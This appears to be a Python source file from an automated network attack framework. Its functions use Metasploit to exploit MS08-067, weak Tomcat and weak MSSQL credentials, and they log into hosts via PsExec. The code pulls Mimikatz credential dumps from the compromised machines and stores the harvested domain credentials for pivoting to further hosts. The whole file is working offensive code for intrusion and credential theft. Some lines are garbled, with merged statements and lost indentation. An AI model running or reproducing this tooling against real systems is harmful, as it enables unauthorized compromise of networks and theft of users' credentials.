def collectCredentials(footprint_id):
logVal("cred", "started")
conf = ConfigParser.ConfigParser()
conf.read("connections.conf")
db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
db.autocommit(True)
msfpass = ""
while msfpass == "":
time.sleep(1)
msfpass = dbfunctions.getMsfPass(db, footprint_id)
connected = False
client = None
console_id = None
logVal("cred", "got pass: "******"cred", "got res: " + str(res))
console_id = res['id']
#while True:
if True:
if True:
host_data = dbfunctions.getHostToLogInTo(db, footprint_id)
if host_data == None:
logVal("cred", "no hosts to log in to. will check again in 5 seconds")
time.sleep(5)
else:
#try:
if True:
logVal("cred", "log in to host {0} with creds {1}\{2} : {3}".format(host_data[1], host_data[3], host_data[4], host_data[5]))
lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
msflog = metasploitfunctions.loginWithPsExec(client, console_id, lhost, host_data[1], msfpass, host_data[3], host_data[4], host_data[5])
logVal("cred", "logged into {0}. looking for creds".format(host_data[1]))
loginSuccess = True
for l in msflog:
if l.find("STATUS_LOGON_FAILURE") > -1:
loginSuccess = False
logVal("cred", "creds did not work on {0}".format(host_data[1]))
dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], False)
if loginSuccess:
logVal("cred", "creds worked on {0}".format(host_data[1]))
dbfunctions.addLoginAttemptResult(db, host_data[0], host_data[2], True)
creds = metasploitfunctions.extractMimikatzCreds(msflog)
for cred in creds:
dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
logVal("cred", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
#except:
#logVal("cred", "an error occurred")
cleanup = client.call('console.destroy',[console_id])
def vulnExploiter(footprint_id, options):
conf = ConfigParser.ConfigParser()
conf.read("connections.conf")
db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
db.autocommit(True)
msfpass = ""
while msfpass == "":
time.sleep(1)
msfpass = dbfunctions.getMsfPass(db, footprint_id)
while True:
if options.exploitMs08067:
host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id)
if host_data == None:
logVal("ms08", "no vulnerable hosts. will check again in 5 seconds")
else:
print "exploiting ms08"
p1 = multiprocessing.Process(target=exploitMS08067, args=(footprint_id, ))
p1.start()
p1.join()
if options.expoitWeakMsSqlCreds:
host_data = dbfunctions.getHostVulnerableWeakSqlCreds(db, footprint_id)
if host_data == None:
logVal("sql", "no vulnerable hosts. will check again in 5 seconds")
else:
print "exploiting sql"
p2 = multiprocessing.Process(target=exploitWeakSqlCreds, args=(footprint_id, ))
p2.start()
p2.join()
if options.exploitWeakTomcatCreds:
host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id)
if host_data == None:
logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds")
else:
print "exploiting tomcat"
p2 = multiprocessing.Process(target=exploitWeakTomcatCreds, args=(footprint_id, ))
p2.start()
p2.join()
if options.credPivot:
host_data = dbfunctions.getHostToLogInTo(db, footprint_id)
if host_data == None:
logVal("cred", "no hosts to log in to. will check again in 5 seconds")
else:
#collectCredentials(footprint_id)
print "logging in with known creds"
p = multiprocessing.Process(target=collectCredentials, args=(footprint_id, ))
p.start()
p.join()
time.sleep(1)
def exploitMS08067(footprint_id):
logVal("ms08", "started")
conf = ConfigParser.ConfigParser()
conf.read("connections.conf")
db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
db.autocommit(True)
msfpass = ""
while msfpass == "":
time.sleep(2)
msfpass = dbfunctions.getMsfPass(db, footprint_id)
connected = False
client = None
console_id = None
logVal("ms08", "got pass: "******"ms08", "got res: " + str(res))
console_id = res['id']
logVal("ms08", "connected")
if True:
#try:
if True:
#while True:
host_data = dbfunctions.getHostVulnerableToMS08067(db, footprint_id)
if host_data == None:
logVal("ms08", "no vulnerable hosts. will check again in 5 seconds")
time.sleep(5)
else:
try:
logVal("ms08", "exploiting host {0}".format(host_data[0]))
lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
msflog = metasploitfunctions.exploitMS08067(client, console_id, lhost, host_data[0], msfpass)
creds = metasploitfunctions.extractMimikatzCreds(msflog)
for cred in creds:
dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
logVal("ms08", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
dbfunctions.setHostExploitedDate(db, host_data[1])
except:
logVal("sql", "error exploiting host {0}".format(host_data[0]))
time.sleep(1)
def exploitWeakTomcatCreds(footprint_id):
logVal("tomcat", "started")
conf = ConfigParser.ConfigParser()
conf.read("connections.conf")
db = MySQLdb.connect(host="localhost", user=conf.get('MySQL', 'user'), passwd=conf.get('MySQL', 'pass'), db=conf.get('MySQL', 'db'))
db.autocommit(True)
msfpass = ""
while msfpass == "":
time.sleep(1)
msfpass = dbfunctions.getMsfPass(db, footprint_id)
connected = False
sqlclient = None
sqlconsole_id = None
logVal("tomcat", "got pass: "******"tomcat", "got res: " + str(sqlres))
sqlconsole_id = sqlres['id']
if True:
if True:
# while True:
host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db, footprint_id)
if host_data == None:
logVal("tomcat", "no vulnerable hosts. will check again in 5 seconds")
time.sleep(5)
else:
#try:
if True:
logVal("tomcat", "exploiting host {0}".format(host_data[0]))
lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
msflog = metasploitfunctions.exploitWeakTomcatCreds(sqlclient, sqlconsole_id, lhost, host_data[0], msfpass, host_data[3].split(":")[0], host_data[3].split(":")[1].replace("<empty>", ""))
logVal("tomcat", "done exploiting {0}. extracting creds".format(host_data[0]))
creds = metasploitfunctions.extractMimikatzCreds(msflog)
for cred in creds:
dbfunctions.addDomainCreds(db, footprint_id, cred[1], cred[0], cred[2], "", "", "")
logVal("tomcat", "adding creds {0} :: {1} :: {2}".format(cred[1], cred[0], cred[2]))
dbfunctions.setHostExploitedDate(db, host_data[1])
